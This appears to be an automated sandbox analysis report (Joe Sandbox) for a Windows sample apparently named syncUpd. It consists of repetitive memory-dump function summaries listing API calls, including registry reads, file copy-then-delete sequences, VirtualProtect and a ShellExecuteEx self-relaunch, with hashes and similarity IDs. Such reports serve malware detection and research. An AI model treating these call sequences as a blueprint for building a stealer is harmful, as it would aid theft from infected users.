                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3225020163-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 0090457B
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00904582
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,00624B8C,00000000,00020119,00000000), ref: 009045A2
                                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(00000000,00624C24,00000000,00000000,000000FF,000000FF), ref: 009045C3
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 009045CD
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3225020163-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 004185B3
                                                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
                                                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 004185CA
                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 004185D8
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 004185E8
                                                                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 004185FC
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0090881A
                                                                                                                                                                                                                                                                • Part of subcall function 00907D93: __getptd_noexit.LIBCMT ref: 00907D96
                                                                                                                                                                                                                                                                • Part of subcall function 00907D93: __amsg_exit.LIBCMT ref: 00907DA3
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00908831
                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 0090883F
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 0090884F
                                                                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00908863
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00413323
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 004133E6
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00413415
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                                                                              • API String ID: 1148417306-4251816714
                                                                                                                                                                                                                                                              • Opcode ID: b289bdfcdd97fb2c36f2262df7a6878459097f71b1333ec9b5e1507959396b69
                                                                                                                                                                                                                                                              • Instruction ID: 9270ca21e45796c21bf284f368f95b7d0dbf71ea93a5a7258f1c6a627d8bac6b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b289bdfcdd97fb2c36f2262df7a6878459097f71b1333ec9b5e1507959396b69
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 383144B19012189BDB14EB91DD91FDDBB78AF48304F80518DF20566191DF746B89CF9C
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 0090358A
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 0090364D
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0090367C
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                                                                              • API String ID: 1148417306-4251816714
                                                                                                                                                                                                                                                              • Opcode ID: 966933ccc87c1a91f6790240733d41a2cf755532164395114738cccf7d819298
                                                                                                                                                                                                                                                              • Instruction ID: a34589eb461510bee07a53fb5ca9abb715456d1425302a0e8dcc599c36c01be4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 966933ccc87c1a91f6790240733d41a2cf755532164395114738cccf7d819298
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 613149B1C01218AEDB14EB90DC92FEEB778AF88300F805189F215661D1DF746B48CF64
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                              • String ID: :h@$:h@$@:h@
                                                                                                                                                                                                                                                              • API String ID: 544645111-3492212131
                                                                                                                                                                                                                                                              • Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                                                              • Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
                                                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00415478
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                                                                              • String ID: %hs
                                                                                                                                                                                                                                                              • API String ID: 659108358-2783943728
                                                                                                                                                                                                                                                              • Opcode ID: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
                                                                                                                                                                                                                                                              • Instruction ID: 2a04a3b42468460cff415e79ad4cc7303691da2b1e165ac812b33aed5ccf4e4e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5E0ECB5A40608BFDB20DFD4ED0AEAD77A9EB48701F100194F90AD7640DA719E109B95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 009054C7: GetSystemTime.KERNEL32(0041D7D7,00624AA0,0041D129,?,?,008F1620,?,0000001A,0041D7D7,00000000,?,006249EC,?,004215A4,0041D7D6), ref: 009054ED
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008F9E18
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FA1D1
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: memcmp.MSVCRT ref: 008F9A72
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: memset.MSVCRT ref: 008F9AA5
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: LocalAlloc.KERNEL32(00000040,?), ref: 008F9AF5
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000), ref: 008F9F14
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 008FA252
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3258613111-0
                                                                                                                                                                                                                                                              • Opcode ID: 799f4e43c5f134c97f91417602cae88205eca33e556a901edf62be0764f24219
                                                                                                                                                                                                                                                              • Instruction ID: 752896514542b3c3ddd4948ed283218da0c23b33a5ec3e9ca78872aca56bed7a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 799f4e43c5f134c97f91417602cae88205eca33e556a901edf62be0764f24219
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97D1AA72C081189ECB15EBE4DCA2EEEB339AF94714F508159F156621D2EE707A48CBA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0095FF10,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CBD1
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040CDE8
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040CDFC
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040CE75
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                                                                              • Opcode ID: 1a2281000a43369f0a13837b1e72b39a7635c931107537b917ed16c9f17fd920
                                                                                                                                                                                                                                                              • Instruction ID: 6e212494759c8e3b152de70cf12e9653d7fde48daaab02ad2b76da051d612c4f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a2281000a43369f0a13837b1e72b39a7635c931107537b917ed16c9f17fd920
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B914A729102049BCB14FBA1DC51EEE7739BF14304F51425EF51676491EF38AA89CBB8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 009054C7: GetSystemTime.KERNEL32(0041D7D7,00624AA0,0041D129,?,?,008F1620,?,0000001A,0041D7D7,00000000,?,006249EC,?,004215A4,0041D7D6), ref: 009054ED
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008FCE38
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FD04F
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FD063
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 008FD0DC
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                                                                              • Opcode ID: be897372b75303ba80917d01fc52a5d1a0540ec3c5e777bfdcc3a35dd85c6f1a
                                                                                                                                                                                                                                                              • Instruction ID: ba76fd98c0955b7726b4d3979615f40b6c90072e6f06542bd3c284982a5f3f9b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be897372b75303ba80917d01fc52a5d1a0540ec3c5e777bfdcc3a35dd85c6f1a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA910A72D042089ECB14FBE4DCA2EEEB339AF94714F504269F516A21D1EF707A49CB61
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0095FF10,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040D0DF
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040D0F3
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040D16C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                                                                              • Opcode ID: 8e8863251cc6f26f4367d46da0deda438ae25ff5ad045d48b982a9fd54c4a87c
                                                                                                                                                                                                                                                              • Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e8863251cc6f26f4367d46da0deda438ae25ff5ad045d48b982a9fd54c4a87c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 009054C7: GetSystemTime.KERNEL32(0041D7D7,00624AA0,0041D129,?,?,008F1620,?,0000001A,0041D7D7,00000000,?,006249EC,?,004215A4,0041D7D6), ref: 009054ED
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008FD1A8
